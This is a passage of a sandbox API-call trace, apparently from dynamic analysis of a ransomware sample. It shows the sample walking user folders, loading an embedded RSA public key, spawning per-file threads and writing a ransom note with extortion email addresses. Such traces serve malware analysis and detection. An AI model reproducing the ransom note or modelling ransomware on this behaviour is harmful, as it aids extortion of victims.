SetErrorMode (uMode=0x1) returned 0x1 [0136.194] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Downloads\\_HELP_INSTRUCTION.TXT") returned 48 [0136.194] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0136.194] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0136.194] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x750) returned 0x0 [0136.194] RegQueryValueExW (in: hKey=0x750, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d01000, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3d01000*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0136.194] RegCloseKey (hKey=0x750) returned 0x0 [0136.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0136.195] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0136.195] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\downloads\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0136.195] CreateFileW (lpFileName="C:\\Users\\Default\\Downloads\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\downloads\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0136.195] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Downloads\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0136.195] PathFindFileNameW (pszPath="C:\\Users\\Default\\Downloads") returned="Downloads" [0136.195] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0136.195] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0136.195] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0136.195] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0136.195] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0136.195] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0136.195] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0136.195] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0136.195] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 0 [0136.196] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0136.196] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0136.196] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0136.196] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0136.196] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0136.196] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0136.196] SetErrorMode (uMode=0x1) returned 0x1 [0136.196] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0136.196] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\" [0136.196] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Favorites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\" [0136.196] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\*.*") returned="C:\\Users\\Default\\Favorites\\*.*" [0136.196] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0136.197] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites") returned="Favorites" [0136.197] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0136.197] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0136.197] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0136.197] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0136.197] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0136.197] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0136.197] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0136.197] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0136.197] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0136.198] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0136.198] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\", lpSrch="Desktop") returned 0x0 [0136.198] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\", lpSrch="DESKTOP") returned 0x0 [0136.198] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\") returned 31 [0136.198] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0136.198] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0136.198] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\" [0136.198] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x758 [0136.198] Sleep (dwMilliseconds=0x96) [0136.349] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0136.349] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0136.349] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0136.349] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0136.349] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0136.349] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0136.350] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 0 [0136.350] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0136.350] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\*.*") returned="C:\\Users\\Default\\Favorites\\*.*" [0136.351] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\", lpSrch="Desktop") returned 0x0 [0136.351] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\", lpSrch="DESKTOP") returned 0x0 [0136.351] SetErrorMode (uMode=0x1) returned 0x1 [0136.351] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Favorites\\_HELP_INSTRUCTION.TXT") returned 48 [0136.351] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0136.351] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0136.351] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x75c) returned 0x0 [0136.351] RegQueryValueExW (in: hKey=0x75c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d01230, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3d01230*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0136.351] RegCloseKey (hKey=0x75c) returned 0x0 [0136.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0136.351] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0136.351] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0136.352] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0136.354] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0136.355] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites") returned="Favorites" [0136.355] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0136.355] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0136.355] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0136.355] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0136.355] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0136.355] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0136.355] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0136.355] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0136.355] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0136.355] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Default\\Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0136.355] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\" [0136.355] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="Links" | out: lpString1="C:\\Users\\Default\\Favorites\\Links") returned="C:\\Users\\Default\\Favorites\\Links" [0136.355] SetErrorMode (uMode=0x1) returned 0x1 [0136.355] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites\\Links" | out: lpString1="C:\\Users\\Default\\Favorites\\Links") returned="C:\\Users\\Default\\Favorites\\Links" [0136.355] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Links", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Links\\") returned="C:\\Users\\Default\\Favorites\\Links\\" [0136.355] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Favorites\\Links\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Links\\") returned="C:\\Users\\Default\\Favorites\\Links\\" [0136.355] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Links\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\Links\\*.*") returned="C:\\Users\\Default\\Favorites\\Links\\*.*" [0136.355] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3d11398 [0136.357] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites\\Links") returned="Links" [0136.357] lstrcpyW (in: lpString1=0x17b644, lpString2="Links" | out: lpString1="Links") returned="Links" [0136.357] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0136.357] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0136.357] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0136.357] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0136.357] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0136.357] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0136.357] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0136.357] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0136.357] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0136.357] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="Desktop") returned 0x0 [0136.357] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="DESKTOP") returned 0x0 [0136.357] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\") returned 37 [0136.357] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0136.357] lstrcpyW (in: lpString1=0x17be7c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0136.358] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" [0136.358] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x764 [0136.358] Sleep (dwMilliseconds=0x96) [0136.505] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0136.505] lstrcmpW (lpString1="Web Slice Gallery.url", lpString2="..") returned 1 [0136.505] lstrcmpW (lpString1="Web Slice Gallery.url", lpString2=".") returned 1 [0136.506] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0136.506] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="ntldr") returned 0x0 [0136.506] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="NTLDR") returned 0x0 [0136.506] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="NTDETECT.COM") returned 0x0 [0136.506] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="ntdetect.com") returned 0x0 [0136.506] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="Desktop") returned 0x0 [0136.506] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="DESKTOP") returned 0x0 [0136.506] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\") returned 37 [0136.506] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0136.506] lstrcpyW (in: lpString1=0x17be7c, lpString2="Web Slice Gallery.url" | out: lpString1="Web Slice Gallery.url") returned="Web Slice Gallery.url" [0136.506] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" [0136.506] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x768 [0136.507] Sleep (dwMilliseconds=0x96) [0136.661] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0136.661] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0136.662] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0136.662] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites\\Links" | out: lpString1="C:\\Users\\Default\\Favorites\\Links") returned="C:\\Users\\Default\\Favorites\\Links" [0136.662] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Links", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\Links\\*.*") returned="C:\\Users\\Default\\Favorites\\Links\\*.*" [0136.662] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="Desktop") returned 0x0 [0136.662] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Links\\", lpSrch="DESKTOP") returned 0x0 [0136.662] SetErrorMode (uMode=0x1) returned 0x1 [0136.662] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Favorites\\Links\\_HELP_INSTRUCTION.TXT") returned 54 [0136.662] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0136.662] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0136.662] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x76c) returned 0x0 [0136.663] RegQueryValueExW (in: hKey=0x76c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d01460, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3d01460*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0136.663] RegCloseKey (hKey=0x76c) returned 0x0 [0136.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0136.663] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0136.663] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\links\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0136.663] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\links\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0136.663] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3d11398 [0136.663] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites\\Links") returned="Links" [0136.663] lstrcpyW (in: lpString1=0x17b644, lpString2="Links" | out: lpString1="Links") returned="Links" [0136.663] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0136.663] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0136.663] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0136.663] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0136.664] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0136.664] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 